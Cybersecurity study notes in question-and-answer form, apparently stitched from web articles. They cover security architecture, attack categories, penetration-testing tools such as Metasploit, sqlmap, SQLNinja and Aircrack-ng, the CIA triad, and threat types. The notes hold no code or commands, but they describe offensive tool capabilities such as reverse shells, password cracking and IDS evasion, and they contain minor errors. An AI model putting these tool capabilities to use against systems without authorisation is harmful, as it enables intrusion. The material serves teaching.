*Chapter -1*

Cyber Security Concepts

1. Discuss security architecture.

Answer- Security architecture is a unified security design that addresses the necessities and
potential risks involved in a certain scenario or environment. It also specifies when and where
to apply security controls. The design process is generally reproducible.

In security architecture, the design principles are reported clearly, and in-depth security
control specifications are generally documented in independent documents. System
architecture can be considered a design that includes a structure and addresses the connection
between the components of that structure.

Techopedia Explains Security Architecture

The key attributes of security architecture are as follows:

 Relationships and Dependencies: Signifies the relationship between the various components
inside IT architecture and the way in which they depend on each other.
 Benefits: The main advantage of security architecture is its standardization, which makes it
affordable. Security architecture is cost-effective due to the re-use of controls described in the
architecture.
 Form: Security architecture is associated with IT architecture; however, it may take a variety
of forms. It generally includes a catalogue of conventional controls in addition to relationship
diagrams, principles, and so on.
 Drivers: Security controls are determined based on four factors:
o Risk management
o Benchmarking and good practice
o Financial
o Legal and regulatory

The key phases in the security architecture process are as follows:

 Architecture Risk Assessment: Evaluates the business influence of vital business assets, and
the odds and effects of vulnerabilities and security threats.
 Security Architecture and Design: The design and architecture of security services, which
facilitate business risk exposure objectives.
 Implementation: Security services and processes are implemented, operated and controlled.
Assurance services are designed to ensure that the security policy and standards, security
architecture decisions, and risk management are mirrored in the real runtime implementation.
 Operations and Monitoring: Day-to-day processes, such as threat and vulnerability
management and threat management. Here, measures are taken to supervise and handle the
operational state in addition to the depth and breadth of the systems security.

2. Types of attacks discuss briefly?

Page | 1
Answer- A cyber-attack is an exploitation of computer systems and networks. It uses
malicious code to alter computer code, logic or data and lead to cybercrimes, such as
information and identity theft.

We are living in a digital era. Now a day, most of the people use computer and internet. Due
to the dependency on digital things, the illegal computer activity is growing and changing
like any type of crime.

Cyber-attacks can be classified into the following categories:

Web-based attacks

These are the attacks which occur on a website or web applications. Some of the important
web-based attacks are as follows-

1. Injection attacks

It is the attack in which some data will be injected into a web application to manipulate the
application and fetch the required information.

Example- SQL Injection, code Injection, log Injection, XML Injection etc.

2. DNS Spoofing

DNS Spoofing is a type of computer security hacking. Whereby a data is introduced into a
DNS resolver's cache causing the name server to return an incorrect IP address, diverting
traffic to the attackers computer or any other computer. The DNS spoofing attacks can go on
for a long period of time without being detected and can cause serious security issues.

3. Session Hijacking

It is a security attack on a user session over a protected network. Web applications create
cookies to store the state and user sessions. By stealing the cookies, an attacker can have
access to all of the user data.

4. Phishing

Phishing is a type of attack which attempts to steal sensitive information like user login
credentials and credit card number. It occurs when an attacker is masquerading as a
trustworthy entity in electronic communication.

5. Brute force

It is a type of attack which uses a trial and error method. This attack generates a large number
of guesses and validates them to obtain actual data like user password and personal
identification number. This attack may be used by criminals to crack encrypted data, or by
security, analysts to test an organization's network security.

6. Denial of Service

Page | 2
It is an attack which meant to make a server or network resource unavailable to the users. It
accomplishes this by flooding the target with traffic or sending it information that triggers a
crash. It uses the single system and single internet connection to attack a server. It can be
classified into the following-

Volume-based attacks- Its goal is to saturate the bandwidth of the attacked site, and is
measured in bit per second.

Protocol attacks- It consumes actual server resources, and is measured in a packet.

Application layer attacks- Its goal is to crash the web server and is measured in request per
second.

7. Dictionary attacks

This type of attack stored the list of a commonly used password and validated them to get
original password.

8. URL Interpretation

It is a type of attack where we can change the certain parts of a URL, and one can make a
web server to deliver web pages for which he is not authorized to browse.

9. File Inclusion attacks

It is a type of attack that allows an attacker to access unauthorized or essential files which is
available on the web server or to execute malicious files on the web server by making use of
the include functionality.

10. Man in the middle attacks

It is a type of attack that allows an attacker to intercepts the connection between client and
server and acts as a bridge between them. Due to this, an attacker will be able to read, insert
and modify the data in the intercepted connection.

System-based attacks

These are the attacks which are intended to compromise a computer or a computer network.
Some of the important system-based attacks are as follows-

1. Virus

It is a type of malicious software program that spread throughout the computer files without
the knowledge of a user. It is a self-replicating malicious computer program that replicates by
inserting copies of it into other computer programs when executed. It can also execute
instructions that cause harm to the system.

2. Worm

Page | 3
It is a type of malware whose primary function is to replicate itself to spread to uninfected
computers. It works same as the computer virus. Worms often originate from email
attachments that appear to be from trusted senders.

3. Trojan horse

It is a malicious program that occurs unexpected changes to computer setting and unusual
activity, even when the computer should be idle. It misleads the user of its true intent. It
appears to be a normal application but when opened/executed some malicious code will run
in the background.

4. Backdoors

It is a method that bypasses the normal authentication process. A developer may create a
backdoor so that an application or operating system can be accessed for troubleshooting or
other purposes.

5. Bots

A bot (short for "robot") is an automated process that interacts with other network services.
Some bots program run automatically, while others only execute commands when they
receive specific input. Common examples of bots program are the crawler, chatroom bots,
and malicious bots.

3. What is information gathering? State different types of information gathering?

Answer- "Information is power," as the saying goes. And in most scenarios it's true: having
critical information, at the right time, and especially knowing how to use it, can be a great
source of power.

Of course, hacking has evolved too: nowadays you can find a lot of automated OSINT
Tools that can help anyone with security research and intel reconnaissance in a way that just
wasn’t possible twenty years ago.

In past decades, ethical hacking and penetration testing were performed by only a few
security experts. Now almost anyone can report security incidents. Ethical hacking tools
allow you to scan, search and find the flaws and vulnerabilities within any company to help
make their systems and applications more secure (as seen in the recent Top CVE’s exploited
in the wild post published a few weeks ago).

Today we’ll explore the best ethical hacking tools used by modern security researchers.

1. John the Ripper

John the Ripper is one of the most popular password crackers of all time. It’s also one of the
best security tools available to test password strength in your operating system, or for
auditing one remotely.

Page | 4
This password cracker is able to auto-detect the type of encryption used in almost any
password, and will change its password test algorithm accordingly, making it one of the most
intelligent password cracking tools ever.

This ethical hacking tool uses brute force technology to decipher passwords and algorithms
such as:

 DES, MD5, Blowfish

 Kerberos AFS
 Hash LM (Lan Manager), the system used in Windows NT / 2000 / XP / 2003
 MD4, LDAP, MySQL (using third-party modules)

Another bonus is that JTR is open source, multi-platform and fully available for Mac, Linux,
Windows and Android.

¶2. Metasploit

Metasploit is an open source cyber-security project that allows infosec professionals to use
different penetration testing tools to discover remote software vulnerabilities. It also functions
as an exploit module development platform.

One of the most famous results of this project is the Metasploit Framework, written in Ruby,
which enables you to develop, test and execute exploits easily. The framework includes a set
of security tools that can be used to:

 Evade detection systems

 Run security vulnerability scans
 Execute remote attacks
 Enumerate networks and hosts

Metasploit offers three different versions of their software:

 Pro: ideal for penetration testing and IT security teams.

 Community: used by small companies and infosec students.
 Framework: the best for app developers and security researchers.

Supported platforms include:

 Mac OS X
 Linux
 Windows

¶3. Nmap

Nmap (Network Mapper) is a free open source security tool used by infosec professionals to
manage and audit network and OS security for both local and remote hosts. It's one of the
most popular tools in the hackers toolkit..

Despite being one of the oldest security tools in existence (launched in 1997), it continues to
be actively updated and receives new improvements every year.

Page | 5
It’s also regarded as one of the most effective network mappers around, known for being fast
and for consistently delivering thorough results with any security investigation.

What can you do with Nmap?

 Audit device security

 Detect open ports on remote hosts
 Network mapping and enumeration
 Find vulnerabilities inside any network
 Launch massive DNS queries against domains and subdomains

Supported platforms include:

 Mac OS X
 Linux, OpenBSD and Solaris
 Microsoft Windows

4. Wireshark

Wiresharkis a free open-source software that allows you to analyze network traffic in real
time. Thanks to its sniffing technology, Wireshark is widely known for its ability to detect
security problems in any network, as well as for its effectiveness in solving general
networking problems.

While sniffing the network, you’re able to intercept and read results in human-readable
format, which makes it easier to identify potential problems (such as low latency), threats and
vulnerabilities.

Main features:

 Saves analysis for offline inspection

 Packet browser
 Powerful GUI
 Rich VoIP analysis
 Inspects and decompresses gzip files
 Reads other capture files formats including: Sniffer Pro, tcpdump (libpcap), Microsoft
network monitor, Cisco Secure IDS iplog, etc.
 Supported ports and network devices: Ethernet, IEEE 802.11, PPP/HDLC, ATM,
Bluetooth, USB, Token Ring, Frame Relay, FDDI.
 Protocol decryption includes but not limited to IPsec, ISAKMP, Kerberos, SNMPv3,
SSL/TLS, WEP, and WPA/WPA2
 Exports results to XML, PostScript, CSV, or plain text

Wireshark supports up to 2000 different network protocols, and is available on all major
operating systems including:

 Linux
 Windows
 Mac OS X
 FreeBSD, NetBSD, OpenBSD

Page | 6
¶5. OpenVAS

OpenVAS (also known as the old classic ―Nessus‖) is an open-source network scanner used
to detect remote vulnerabilities in any hosts. One of the best-known network vulnerability
scanners, it’s very popular among system administrators and DevOps and infosec
professionals.

Main features

 Powerful web-based interface

 +50,000 network vulnerability tests
 Simultaneous multiple host scanning
 Able to stop, pause and resume scan tasks
 False positive management
 Scheduled scans
 Graphics and statistics generation
 Exports results to plain text, XML, HTML or LateX
 Powerful CLI available
 Fully integrated with Nagios monitoring software

While its web-based interface allows it to be run from any operating system, a CLI is also
available and works well for Linux, Unix and Windows operating systems.

The free version can be downloaded from the OpenVAS website, but there is also a
commercial enterprise license available from the Greenbone Security (parent company)
website.

6. IronWASP

If you’re going to perform ethical hacking, IronWASP is another great tool. It’s free, open
source and multi-platform, perfect for those who need to audit their web servers and public
applications.

One of the most appealing things about IronWASP is that you don’t need to be an expert to
manage its main features. It’s all GUI-based, and full scans can be performed in only a few
clicks. So, if you’re just getting started with ethical hacking tools, this is a great way to start.

Some of its main features include:

 Powerful GUI-based interface

 Web scan sequence recording
 Exports results into HTML and RTF file format
 25+ different web vulnerabilities
 False positive and negative management
 Full Python and Ruby support for its scripting engine
 Can be extended by using modules written in C#, Ruby, and Python
 Supported platforms: Windows, Linux with Wine, and MacOS using CrossOver

Page | 7
¶7. Nikto

Nikto is another favorite in the hackers toolkit, well-known as part of the Kali Linux
Distribution. Other popular Linux distributions such as Fedora already come with Nikto
available in their software repositories as well.

This security tool is used to scan web servers and perform different types of tests against the
specified remote host. Its clean and simple command line interface makes it really easy to
launch any vulnerability testing against your target, as you can see in the following
screenshot:

Nikto’s main features include:

 Detects default installation files on any OS

 Detects outdated software applications.
 Runs XSS vulnerability tests
 Launches dictionary-based brute force attacks
 Exports results into plain text, CSV or HTML files
 Intrusion detection system evasion with LibWhisker
 Integration with Metasploit Framework

¶8. SQLMap

sqlmap is a cool cyber-security tool written in Python that helps security researchers to
launch SQL code injection tests against remote hosts. With SQLMap you can detect and test
different types of SQL-based vulnerabilities to harden your apps and servers, or to report
vulnerabilities to different companies.

Its SQL injection techniques include:

 UNION query-based
 time-based blind
 boolean-based blind
 error-based
 stacked queries
 out-of-band

Main features:

 Multiple database server support: Oracle, PostgreSQL, MySQL and MSSQL, MS

Access, DB2 or Informix.
 Automatic code injection capabilities
 Password hash recognition
 Dictionary-based password cracking
 User enumeration
 Get password hashes
 View user privileges and databases
 Database user privilege escalation
 Dump table information
 Executes remote SQL SELECTS

Page | 8
Check out the next video to see the true power of SQLMap using the sqlmap out-of-band
injection working with Metasploit integration against Microsoft SQL Server:

Video could not be loaded at this time.

¶9. SQLNinja

SQLNinja is another SQL vulnerability scanner bundled with Kali Linux distribution. This
tool is dedicated to target and exploit web apps that use MS SQL Server as the backend
database server. Written in Perl, SQLNinja is available in multiple Unix distros where the
Perl interpreter is installed, including:

 Linux
 Mac OS X & iOS
 FreeBSD

SQLninja can be run in different types of modes such as:

 Test mode
 Verbose mode
 Fingerprint remote database mode
 Brute force attack with a word list
 Direct shell & reverse shell
 Scanner for outbound ports
 Reverse ICMP Shell
 DNS tunnelled shell

¶10. Maltego

Maltego is the perfect tool for intel gathering and data reconnaissance while you’re
performing the first analysis of your target.

In this case, it can be used to correlate and determine relationships between people, names,
phone numbers, email addresses, companies, organizations and social network profiles.

Along with online resources like Whois data, DNS records, social networks, search engines,
geolocation services and online API services it can also be used to investigate the correlation
between internet-based infrastructures including:

 Domain names
 DNS servers
 Netblocks
 IP addresses
 Files
 Web Pages

Main features include:

 GUI-based interface
 Analyzes up to 10.000 entities per graph

Page | 9
  Extended correlation capabilities
 Data sharing in real time
 Correlated data graphics generator
 Exports graphs to GraphML
 Generates entity lists
 Can copy and paste information

This application is available for Windows, Linux, and Mac OS, and the only software
requirement is to have Java 1.8 or greater installed.

¶11. Burp Suite

Burp Suite may well be one of the most popular platforms used in the security testing and
bug bounty hunting industry today. It includes several hacking tools that enable bug bounty
hunters and security researchers to detect, map, analyze, and ultimately exploit vulnerabilities
within the attack surface of any application.

Its main features include:

 Automated penetration testing

 Manual penetration testing techniques
 Interception of browser-based data
 Fast fuzzing and brute forcing attacks
 Automated vulnerability scanning
 Ability to perform attack analysis
 Productivity tools

¶12. NetStumbler

NetStumbler (also known as MiniStumbler) is one of the top ethical hacking tools used to
analyze IEEE 902.11g, 802, and 802.11b networks on Windows operating systems.

Often called ―the Swiss Army knife of wireless network analysis‖, this hacking tool is now
one of the most popular pieces of software used to find, pivot and cross-relate data from a
wireless network, enabling researchers and IT administrators to find, analyze, configure and
harden their wireless networks.

Key NetStumbler features and capabilities include:

 Find and explore access points

 Access point filters
 Identify access point network configuration
 Detect illegal/unauthorized access points over the network
 Find root cause of network interferences
 Analysis of signal strength over the network

Page | 10
¶13. AirCrack-ng

AirCrack-ng is a respected Wifi security suite for home and corporate security investigations.
It includes full support for 802.11 WEP and WPA-PSK networks and works by capturing
network packets. It then analyzes and uses them to crack Wifi access.

For old-school security professionals, AirCrack-ng includes a fancy terminal-based interface

along with a few more interesting features.

Main features:

 Extensive documentation (wiki, manpages)

 Active community (forums and IRC channels)
 Support for Linux, Mac and Windows Wifi detection
 Launches PTW, WEP and Fragmentation attacks
 Supports WPA Migration Mode
 Fast cracking speed
 Multiple Wifi card support
 Integration with 3rd party tools

As a bonus, it comes bundled with a lot of Wifi auditing tools including:

 airbase-ng
 aircrack-ng
 airdecap-ng
 airdecloak-ng
 airdriver-ng
 aireplay-ng
 airmon-ng
 airodump-ng
 airolib-ng
 airserv-ng
 airtun-ng
 easside-ng
 packetforge-ng
 tkiptun-ng
 wesside-ng
 airdecloak-ng

14. Ettercap

Ettercap is a network interceptor and packet sniffer for LAN networks. It supports active and
passive scans as well as various protocols, including encrypted ones such as SSH and
HTTPS.

Other capabilities include network and host analysis (like OS fingerprint), as well as network
manipulation over established connections -- which makes this tool great for testing man-in-
the-middle attacks.

Main features

Page | 11
  Active and passive protocol analysis
 Filters based on IP source and destination, Mac and ARP addresses
 Data injection into established connections
 SSH and HTTPS encryption-based protocols
 Sniffs remote traffic over GRE tunnel
 Extensible with plugins
 Protocol supports include Telnet, FTP, Imap, Smb, MySQL, LDAP, NFS, SNMP,
HTTP, etc.
 Determines OS name and version
 Able to kill established LAN connections
 DNS Hijacking

¶15. Canvas

Canvas is a great alternative to Metasploit, offering more than 800 exploits for testing remote
networks.

Main features

 Remote network exploitation

 Targets different kind of systems
 Targets selected geographic regions
 Takes screenshots of remote systems
 Downloads passwords
 Modifies files inside the system
 Escalates privileges to gain administrator access

This tool also lets you use its platform to write new exploits or use its famous shellcode
generator. It also integrates an alternative to nmap called scanrand, which is especially useful
for port scanning and host discovery over mid to large networks.

Supported platforms include:

 Linux
 MacOSX (requires PyGTK)
 Windows (requires Python and PyGTK)

4. What is open source Free/ Trial Tools in cyber security? Explain different types of
open source Free/ Trial Tools?

Answer- Hackers are diverse, and so are cyber security tools. Various tools are available for
solving different issues. Paid tools like Acunetix and SolarWinds Security Event Manager
offer many advanced features but require significant investment.

But, many open source cyber security tools offer similar features at little or no cost. If you
have the technical expertise to use these free tools, they can provide everything you need to
secure modern day cloud infrastructure.

Page | 12
 Plus, open source tools allow companies to customize the software as they see fit. So, if
you’re interested in free security tools, check out these top 10 open source cyber security
tools.
1. Nmap
Nmap is an open source network scanner that rapidly scans large computer networks. First on
our list of Top 10 Best Free Open Source Cyber Security Tools. Used for hosting discovery
as well as service and OS detection. Utilizes raw IP packets to dig up host information on a
network.

The Nmap Scripting Engine (NSE) offers a solid way of writing and sharing custom scripts
that tackle common problems. You can choose from many readily available scripts to
perform quick network scans.
Pros of Nmap
 Map quickly the network without requiring complicating commands.
 Admins can search through subdomains and DNS queries at ease.
 Highly configurable, so users can easily customize the scans.
 Lightweight nature makes it super quick and speeds up the start up process.
Cons of Nmap
 Mastering all of Nmap’s features has a steep learning curve.
 Scanning can take longer if you do not limit the network.
 Some scan types are aggressive and may unintentionally trigger IDS/IPS mechanisms.
Also Read
Cyber Security vs Network Security – What’s the Difference? (Explained)
2. Metasploit
Metasploit is a penetration testing framework that helps security professionals
perform simulation attacks to find loopholes in a system. Robust feature set that helps detect
bugs and validate attacks.
Additionally Metasploit offers premium tiers for enterprises that need an all in one
penetrating platform. However, the community edition is usually enough for SMEs.
Pros of Metasploit
 Fully cross platform and runs on Linux, macOS, and Windows systems.
 Community support for this open source security tool is excellent.
 Codebase is freely available and you can use it for integrations with other tools.
 Pro version unlocks powerful automation abilities useful for large scale security teams.
Cons of Metasploit
 Free edition is limited in features and requires significant technical expertise.
 Noticeable performance difference between the Windows and Linux versions.
 User intervention is needed for some exploits to work properly.
3. OSSEC
OSSEC is a free HIDS(Host based Intrusion Detection System) that performs in real
time monitoring and analysis. Equipped with a solid correlation and analysis engine. Most
common uses for OSSEC include log analysis, integrity checks, Windows
registry monitoring, and security policy enforcement.
Pros of OSSEC
 Gives you real time alerts for incidents and enables active responses.
 Log analysis- accepts them in formats such as FTP servers, databases (PostgreSQL, MySQL)
and web servers.
 Compliant with various security auditing standards like PCI-DSS and CIS.
 Collects system information effectively and act as a system inventory.

Page | 13
 Cons of OSSEC
 Lack of a monitoring dashboard can make threat visualization harder.
 Upgrading the OSSEC version may result in inconsistencies between rules.
 Miscoordination with pre shared keys ca be troublesome.
Also Read
Cloud Security vs Cyber Security – What’s the Difference? (Explained)
4. Kali Linux
Kali is a popular Linux distribution for digital forensic analysis and penetration
testing. Debian based distro that offers you some of the best open source cyber security tools.
This security focused OS has everything that you need for system assessments, including
surveillance and payload delivery tools.
Pros of Kali Linux
 Specialized environment for security professionals.
 Over 600 penetration tools included.
 Wireless device support.
 Most of the applications are derived from the Debian testing branch.
 You can run it almost everywhere, including the cloud, containers, Android, ARM and WSl.
Cons of Kali Linux
 Steep learning curve and may prove hard for beginners.
 Some of the security tools found on Kali can feel sluggish.
 Driver support for external devices can be improved.
5. OpenVAS
OpenVAS (Open Vulnerability Assessment System) is another choice for our Top 10 Best
Free Open Source Cyber Security Tools. Ideal cyber security tool for vulnerability scanning.
Offer you a solid set of features that can be used for authenticated and unauthenticated
testing. Part of the Greenbone Community Edition suite, a collection of free security tools.
Pros of OpenVAS
 Uses a regularly updated list of NVT(Network Vulnerability Test) feeds for vulnerability
tests.
 Useful for Small Businesses.
 CVE Coverage for bugs and testing.
 Large and dedicated community, so finding support is easy.
 The open source license of OpenVAS enables third party customization.
Cons of OpenVAS
 Requires solid effort to get up and running with this vulnerability scanner.
 Doesn’t offer you any cloud scanner for AWS, Azure, or GCP.
Also Read
What is Cyber Security Audit? Why/How is it Important for your Business
6. Wireshark
Wireshark is a free packet capture and analysis tool for troubleshooting network connections
and analysing IP packets. Proven to be one of the most popular open source
cyber security tools since its release. Captures and analyses data packets in real time makes it
desirable to many organizations.
Pros of Wireshark
 Captures live packets and saves them for later inspection.
 VoIP and VLAN identification.
 Very robust filtering capabilities for sorting through captured data.
 Exports to CSV, XML and plain text.
 Allows you to find problems in networks and solve routing problems

Page | 14
 Cons of Wireshark
 New users will take time to master all the analysis mechanisms.
 Can’t send or alter packets.
 Some users may find the user interface confusing initially
7. OpenIAM
OpenIAM is a solid IAM(Identity and Access Management) platform with on premise
and cloud deployment support. Great tool for businesses that want a free but decent IAM
solution. The community edition of OpenIAM is free, but you can also buy a premium
subscription. Cloud, SaaS, Web based and Windows Desktop.
Pros of OpenIAM
 Features for identity management, web based logins and multi factor authentication.
 Single Sign On.
 Hosted on a cloud provider as an Identity as a Service(IDaaS) program.
 Integrates with other open source tools via OpenID Connect(OIDC).
Cons of OpenIAM
 The documentation support available for this IAM tool is limited.
 Does not generate extensive analytical reports.
Also Read
Cyber Security vs Information Security – What’s the Difference? (Explained)
8. OpenEDR
OpenEDR is an open source Endpoint Detection and Response (EDR) program developed by
the US cybersecurity firm Comodo. Companies can use OpenEDR to secure their
infrastructure against malware, ransomware, data breaches and other threats.
Pros of OpenEDR
 Sleek dashboard and offers powerful data visualization tools.
 Comes with compelling telemetry features and analysis capabilities.
 Deploy OpenEDR for any endpoints and control it via a cloud based console.
Cons of OpenEDR
 Need to pay for retaining any logs past three days.
 There’s no SaaS based deployment tool for OpenEDR yet.
9. OWASP ZAP
OWASP ZAP(Zed Attack Proxy) is one of the most widely used app scanners for the web.
Open source security tool that you can customize as necessary. ZAP’s notable features
include proxy interception, port scanner, passive scanner, automatic testing, etc.
Pros of OWASP ZAP
 Excellent GUI interface that makes testing effortless.
 Actively maintained and rolls out new features and bug fixes regularly.
 API endpoints gives you complete control over its implementation.
Cons of OWASP ZAP
 Reporting feature doesn’t follow any specific format and may feel cluttered.
 Paid support is not available, so technical expertise is sometimes required.
Also Read
What is Application Security? Types, Tools & Examples (Explained)
10. sqlmap
Last on the list of Top 10 Best Free Open Source Cyber Security Tools is sqlmap. Another
cyber security tool for finding and exploiting SQL injection flaws in databases. Features a
powerful detection engine that can easily discover commonly used SQL attacks. Also you
can get various switches for routine tasks like fingerprinting, data fetching, and remote
command execution.

Page | 15
 Pros of sqlmp
 Supports all major databases, including MySQL, MSSQL, PostgreSQL,
Firebird, MariaDB, and Amazon Redshift.
 Connect directly to the database through IP, port and user credentials.
 sqlmap supports enumeration over users, hashes, tables, columns, and privileges.
 It can recognize hash formats automatically and crack them via dictionary attacks.
Cons of sqlmap
 Lacks any GUI interface and requires command line proficiency.
 May need to confirm some vulnerabilities manually.

5. Explain CIA in cyber security?

 Answer- The CIA Triad is an information security model, which is widely popular. It
guides an organization’s efforts towards ensuring data security. The three principles—
confidentiality, integrity, and availability which is also the full for CIA in
cybersecurity, form the cornerstone of a security infrastructure. In fact, it is ideal to
apply these principles to any security program. Confidentiality makes sure that only
authorized personnel are given access or permission to modify data
 Integrity helps maintain the trustworthiness of data by having it in the correct state
and immune to any improper modifications
 Availability means that the authorized users should be able to access data whenever
required

The CIA Triad is so elementary to information security that anytime data violation or any
number of other security incidents occur, it is definitely due to one or more of these
principles being compromised. So, the CIA Triad is always on top of the priority list for any
infosec professional.

Security experts assess threats and vulnerabilities thinking about the impact that they might
have on the CIA of an organization’s assets. Based on that assessment, the security team
enforces a specific set of security controls to minimize the risks within that environment.

CIA Triad Examples

To have a better understanding of how the CIA Triad works in practice, consider an ATM
that allows users to access bank balances and other information. An ATM incorporates
measures to cover the principles of the triad:

Page | 16
  The two-factor authentication (debit card with the PIN code)
provides confidentiality before authorizing access to sensitive data.
 The ATM and bank software ensure data integrity by maintaining all transfer and
withdrawal records made via the ATM in the user’s bank accounting.
 The ATM provides availability as it is for public use and is accessible at all times.

Brief History of the CIA Triad

The CIA Triad came to form over time as wisdom passed among information security
professionals rather than by a single proponent. The formalization of confidentiality can be
traced back to the 1976 U.S. Air Force study. Integrity, on the other hand, was found in a
1987 paper that mentioned that commercial computing requires a special focus on data
correctness. The conception of availability is not clearly known, but the idea rose to
prominence in 1988 due to the attack of the Morris worm, which had devastating effects back
then on thousands of major UNIX machines and the internet had to be partitioned for days to
fix the mess.

It is, however, not clear when the CIA became a triad. The foundational concept seems to
have been established by 1998.

Importance of the CIA Triad

Now that we have covered what the CIA is, it is time to understand why it is more effective
as a triad. The CIA Triad, in a way, helps make sense of the diverse security techniques,
software, and services available. Rather than a shot in the dark, it helps to clearly draw a
picture of what is exactly required that will address the security concerns.

The three concepts exist in tension with one another when it is worked as a triad. For
example, requiring elaborate authentication, in turn, helps ensure confidentiality, but at the
same time, some people who have the right to the data may not get access, thereby, reducing
availability.

As one is forming information security policies, the CIA Triad will help make more effective
decisions on which of the three principles is most useful for the specific set of data and for
the organization overall.

Page | 17
 6. What are threats? Explain different types of threats? What is risk? State different
between risk and threats?

Answer-

THREATS-
In cybersecurity, the most common understanding of a threat is anything that could exploit a
vulnerability, which could affect the confidentiality, integrity or availability of your systems,
data, people and more. (Confidentiality, integrity and availability, sometimes known as the
CIA triad, is another fundamental concept of cybersecurity.)
A more advanced definition of threat is when an adversary or attacker has the opportunity,
capability and intent to bring a negative impact upon your operations, assets, workforce
and/or customers. Examples of this can include malware, ransomware, phishing attacks and
more — and the types of threats out there will continue to evolve.
Importantly, not all threats are the same, according to Bob Rudis, Vice President Data
Science at GreyNoise Intelligence. And that’s where threat intelligence comes in. Rudis says:
“An attacker may have the intent and capability to do harm, but no opportunity.”
For example, your organization may have no vulnerabilities to exploit due to a solid patch
management program or strong network segmentation policies that prevent access to critical
systems. Chances are likely, however, that you do have vulnerabilities, so let’s consider the
risk factor.

Common Sources of Cyber Threats

Here are several common sources of cyber threats against organizations:

 Nation states—hostile countries can launch cyber attacks against local companies and
institutions, aiming to interfere with communications, cause disorder, and inflict damage.
 Terrorist organizations—terrorists conduct cyber attacks aimed at destroying or abusing
critical infrastructure, threaten national security, disrupt economies, and cause bodily harm to
citizens.
 Criminal groups—organized groups of hackers aim to break into computing systems for
economic benefit. These groups use phishing, spam, spyware and malware for extortion, theft
of private information, and online scams.
 Hackers—individual hackers target organizations using a variety of attack techniques. They
are usually motivated by personal gain, revenge, financial gain, or political activity. Hackers
often develop new threats, to advance their criminal ability and improve their personal
standing in the hacker community.
 Malicious insiders—an employee who has legitimate access to company assets, and abuses
their privileges to steal information or damage computing systems for economic or personal
gain. Insiders may be employees, contractors, suppliers, or partners of the target organization.
They can also be outsiders who have compromised a privileged account and are
impersonating its owner.

Types of Cybersecurity Threats

Page | 18
 Malware Attacks

Malware is an abbreviation of ―malicious software‖, which includes viruses, worms, trojans,

spyware, and ransomware, and is the most common type of cyberattack. Malware infiltrates a
system, usually via a link on an untrusted website or email or an unwanted software
download. It deploys on the target system, collects sensitive data, manipulates and blocks
access to network components, and may destroy data or shut down the system altogether.

Here are some of the main types of malware attacks:

 Viruses—a piece of code injects itself into an application. When the application runs, the
malicious code executes.
 Worms—malware that exploits software vulnerabilities and backdoors to gain access to an
operating system. Once installed in the network, the worm can carry out attacks such as
distributed denial of service (DDoS).
 Trojans—malicious code or software that poses as an innocent program, hiding in apps,
games or email attachments. An unsuspecting user downloads the trojan, allowing it to gain
control of their device.
 Ransomware—a user or organization is denied access to their own systems or data via
encryption. The attacker typically demands a ransom be paid in exchange for a decryption
key to restore access, but there is no guarantee that paying the ransom will actually restore
full access or functionality.
 Cryptojacking—attackers deploy software on a victim’s device, and begin using their
computing resources to generate cryptocurrency, without their knowledge. Affected systems
can become slow and cryptojacking kits can affect system stability.
 Spyware—a malicious actor gains access to an unsuspecting user’s data, including sensitive
information such as passwords and payment details. Spyware can affect desktop browsers,
mobile phones and desktop applications.
 Adware—a user’s browsing activity is tracked to determine behavior patterns and interests,
allowing advertisers to send the user targeted advertising. Adware is related to spyware but
does not involve installing software on the user’s device and is not necessarily used for
malicious purposes, but it can be used without the user’s consent and compromise their
privacy.
 Fileless malware—no software is installed on the operating system. Native files like WMI
and PowerShell are edited to enable malicious functions. This stealthy form of attack is
difficult to detect (antivirus can’t identify it), because the compromised files are recognized
as legitimate.
 Rootkits—software is injected into applications, firmware, operating system kernels or
hypervisors, providing remote administrative access to a computer. The attacker can start the
operating system within a compromised environment, gain complete control of the computer
and deliver additional malware.

Social Engineering Attacks

Social engineering involves tricking users into providing an entry point for malware. The
victim provides sensitive information or unwittingly installs malware on their device, because
the attacker poses as a legitimate actor.

Page | 19
 Here are some of the main types of social engineering attacks:

 Baiting—the attacker lures a user into a social engineering trap, usually with a promise of
something attractive like a free gift card. The victim provides sensitive information such as
credentials to the attacker.
 Pretexting—similar to baiting, the attacker pressures the target into giving up information
under false pretenses. This typically involves impersonating someone with authority, for
example an IRS or police officer, whose position will compel the victim to comply.
 Phishing—the attacker sends emails pretending to come from a trusted source. Phishing often
involves sending fraudulent emails to as many users as possible, but can also be more
targeted. For example, ―spear phishing‖ personalizes the email to target a specific user, while
―whaling‖ takes this a step further by targeting high-value individuals such as CEOs.
 Vishing (voice phishing)—the imposter uses the phone to trick the target into disclosing
sensitive data or grant access to the target system. Vishing typically targets older individuals
but can be employed against anyone.
 Smishing (SMS phishing)—the attacker uses text messages as the means of deceiving the
victim.
 Piggybacking—an authorized user provides physical access to another individual who
―piggybacks‖ off the user’s credentials. For example, an employee may grant access to
someone posing as a new employee who misplaced their credential card.
 Tailgating—an unauthorized individual follows an authorized user into a location, for
example by quickly slipping in through a protected door after the authorized user has opened
it. This technique is similar to piggybacking except that the person being tailgated is unaware
that they are being used by another individual.

Supply Chain Attacks

Supply chain attacks are a new type of threat to software developers and vendors. Its purpose
is to infect legitimate applications and distribute malware via source code, build processes or
software update mechanisms.

Attackers are looking for non-secure network protocols, server infrastructure, and coding
techniques, and use them to compromise build and update process, modify source code and
hide malicious content.

Supply chain attacks are especially severe because the applications being compromised
by attackers are signed and certified by trusted vendors. In a software supply chain attack, the
software vendor is not aware that its applications or updates are infected with malware.
Malicious code runs with the same trust and privileges as the compromised application.

Types of supply chain attacks include:

 Compromise of build tools or development pipelines

 Compromise of code signing procedures or developer accounts
 Malicious code sent as automated updates to hardware or firmware components
 Malicious code pre-installed on physical devices

Page | 20
 Man-in-the-Middle Attack

A Man-in-the-Middle (MitM) attack involves intercepting the communication between two

endpoints, such as a user and an application. The attacker can eavesdrop on the
communication, steal sensitive data, and impersonate each party participating in the
communication.

Examples of MitM attacks include:

 Wi-Fi eavesdropping—an attacker sets up a Wi-Fi connection, posing as a legitimate actor,

such as a business, that users may connect to. The fraudulent Wi-Fi allows the attacker to
monitor the activity of connected users and intercept data such as payment card details and
login credentials.
 Email hijacking—an attacker spoofs the email address of a legitimate organization, such as a
bank, and uses it to trick users into giving up sensitive information or transferring money to
the attacker. The user follows instructions they think come from the bank but are actually
from the attacker.
 DNS spoofing—a Domain Name Server (DNS) is spoofed, directing a user to a malicious
website posing as a legitimate site. The attacker may divert traffic from the legitimate site or
steal the user’s credentials.
 IP spoofing—an internet protocol (IP) address connects users to a specific website. An
attacker can spoof an IP address to pose as a website and deceive users into thinking they are
interacting with that website.
